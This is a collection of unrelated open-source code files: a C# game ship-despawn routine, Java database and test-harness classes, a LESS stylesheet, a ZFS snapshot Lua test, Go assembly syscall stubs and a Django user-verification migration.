if ((ShipController.PositionComp.GetPosition() - m_destination).Dot(m_direction) > 0.0f)
{
if (!IsPlayerNearby())
{
var shipGroup = MyCubeGridGroups.Static.Logical.GetGroup(ShipController.CubeGrid);
foreach (var node in shipGroup.Nodes)
{
node.NodeData.SyncObject.SendCloseRequest();
}
}
}
}
private bool IsPlayerNearby()
{
BoundingBox playerBox = new BoundingBox(Vector3.MaxValue, Vector3.MinValue);
MyEntities.GetInflatedPlayerBoundingBox(ref playerBox, MyNeutralShipSpawner.NEUTRAL_SHIP_FORBIDDEN_RADIUS);
if (playerBox.Contains(ShipController.PositionComp.GetPosition()) == ContainmentType.Contains)
return true;
return false;
}
public override void DebugDraw()
{
if (!MyDebugDrawSettings.DEBUG_DRAW_NEUTRAL_SHIPS || ShipController == null) return;
Vector3D cameraPos = MySector.MainCamera.Position;
Vector3D origin = Vector3D.Normalize(ShipController.PositionComp.GetPosition() - cameraPos);
Vector3D destination = Vector3D.Normalize(m_destination - cameraPos);
Vector3D halfPoint = Vector3D.Normalize((origin + destination) * 0.5f) + cameraPos; // Prevent going through the camera
origin += cameraPos;
destination += cameraPos;
Vector3D currentPoint = Vector3D.Normalize(ShipController.WorldMatrix.Translation - cameraPos) + cameraPos;
MyRenderProxy.DebugDrawLine3D(origin, halfPoint, Color.Red, Color.Red, false);
MyRenderProxy.DebugDrawLine3D(halfPoint, destination, Color.Red, Color.Red, false);
MyRenderProxy.DebugDrawSphere(currentPoint, 0.01f, Color.Orange.ToVector3(), 1.0f, false);
MyRenderProxy.DebugDrawSphere(currentPoint + m_direction * 0.015f, 0.005f, Color.Yellow.ToVector3(), 1.0f, false);
MyRenderProxy.DebugDrawText3D(origin, "Remaining time: " + (SHIP_LIFESPAN_MILLISECONDS-MySandboxGame.TotalGamePlayTimeInMilliseconds + m_spawnTime), Color.Red, 1, false);
}
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2012-2020 Aerospike, Inc.
*
* Portions may be licensed to Aerospike, Inc. under one or more contributor
* license agreements WHICH ARE COMPATIBLE WITH THE APACHE LICENSE, VERSION 2.0.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.aerospike.test.sync.basic;
import static org.junit.Assert.fail;
import org.junit.Test;
import com.aerospike.client.Bin;
import com.aerospike.client.Key;
import com.aerospike.client.Record;
import com.aerospike.test.sync.TestSync;
public class TestPutGet extends TestSync {
@Test
public void putGet() {
if (args.singleBin) {
Key key = new Key(args.namespace, args.set, "putgetkey");
Bin bin = new Bin("", "value");
client.put(null, key, bin);
Record record = client.get(null, key);
assertBinEqual(key, record, bin);
}
else {
Key key = new Key(args.namespace, args.set, "putgetkey");
Bin bin1 = new Bin("bin1", "value1");
Bin bin2 = new Bin("bin2", "value2");
client.put(null, key, bin1, bin2);
Record record = client.get(null, key);
assertBinEqual(key, record, bin1);
assertBinEqual(key, record, bin2);
}
}
@Test
public void getHeader() {
Key key = new Key(args.namespace, args.set, "putgetkey");
Record record = client.getHeader(null, key);
assertRecordFound(key, record);
// Generation should be greater than zero. Make sure it's populated.
if (record.generation == 0) {
fail("Invalid record header: generation=" + record.generation + " expiration=" + record.expiration);
}
}
}
| {
"pile_set_name": "Github"
} |
.sapMSD .sapMDialogStretchContent {
padding: 0px;
&.sapMDialogScrollCont {
height: 100%;
}
}
.sapMSD .sapMSDFirstActionGroup {
border-top: 1px solid @sapUiListBorderColor;
box-sizing: border-box;
}
.sapMSD .sapMTB.sapMSDPageHeader {
padding: 0px;
}
| {
"pile_set_name": "Github"
} |
--
-- This file and its contents are supplied under the terms of the
-- Common Development and Distribution License ("CDDL"), version 1.0.
-- You may only use this file in accordance with the terms of version
-- 1.0 of the CDDL.
--
-- A full copy of the text of the CDDL should have accompanied this
-- source. A copy of the CDDL is also available via the Internet at
-- http://www.illumos.org/license/CDDL.
--
--
-- Copyright (c) 2016, 2017 by Delphix. All rights reserved.
--
args = ...
argv = args["argv"]
fs1 = argv[1]
fs2 = argv[2]
longstring = "a"
for i=1,9 do
longstring = longstring .. longstring
end
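-- longstring is now 512 characters, long enough to trigger ENAMETOOLONG for a snapshot name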
-- invalid snapshot names
assert(zfs.sync.snapshot("ceci_nest_pas_une_dataset") == EINVAL);
assert(zfs.sync.snapshot(fs1) == EINVAL)
assert(zfs.sync.snapshot(fs1 .. "@" .. longstring) == ENAMETOOLONG)
assert(zfs.sync.snapshot(fs2 .. "@snap1") == 0)
-- only one snapshot of a filesystem is allowed per TXG.
assert(zfs.sync.snapshot(fs2 .. "@snap2") == EAGAIN)
-- snapshot already exists
assert(zfs.sync.snapshot(fs1 .. "@snap1") == EEXIST)
| {
"pile_set_name": "Github"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for amd64, Solaris are implemented in runtime/syscall_solaris.go
//
TEXT ·sysvicall6(SB),NOSPLIT,$0-88
JMP syscall·sysvicall6(SB)
TEXT ·rawSysvicall6(SB),NOSPLIT,$0-88
JMP syscall·rawSysvicall6(SB)
| {
"pile_set_name": "Github"
} |
# Generated by Django 2.2.11 on 2020-04-12 05:00
from django.db import migrations
def auto_verify_users_with_facility(apps, *args):
user_model = apps.get_model('users', 'User')
# all users who have at least one facility associated with them are verified
for user in user_model.objects.all():
user.verified = user.facility_set.exists()
user.save()
# all users at or above District Lab Admin (user_type 25) are verified
user_model.objects.filter(user_type__gte=25).update(verified=True)
def reverse_auto_verify_users_with_facility(*args):
pass
class Migration(migrations.Migration):
dependencies = [
('users', '0021_make_kerala_everyones_state'),
]
operations = [
migrations.RunPython(
auto_verify_users_with_facility,
reverse_code=reverse_auto_verify_users_with_facility
)
]
| {
"pile_set_name": "Github"
} |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.waveprotocol.wave.model.testing;
import junit.framework.TestCase;
/**
* Generic base implementation for a test case that tests the behaviour of a
* single type. This implementation holds a reference to a factory for
 * creating instances of that interface, and uses that factory to instantiate
* the instance to test in {@link #setUp()}.
*
* @param <T> interface type being tested
*/
public abstract class GenericTestBase<T> extends TestCase {
/** Factory used to create each wave to be tested. */
protected final Factory<? extends T> factory;
// State initialized in setUp()
/** Target to test. */
protected T target;
/**
* Creates this test case, which runs on the wave-datas created by a factory.
*
* @param factory factory for creating the wave-datas to test
*/
protected GenericTestBase(Factory<? extends T> factory) {
this.factory = factory;
}
/**
* {@inheritDoc}
*
* This implementation uses the test's factory to creates a test target.
*/
@Override
protected void setUp() {
target = factory.create();
}
/**
* {@inheritDoc}
*/
@Override
protected void tearDown() throws Exception {
// This is only overridden to expose tearDown to GWTTestBase (which should
// be in GWTTestBase's scope anyway, since it extends TestCase, but for
// some reason it isn't).
super.tearDown();
}
}
| {
"pile_set_name": "Github"
} |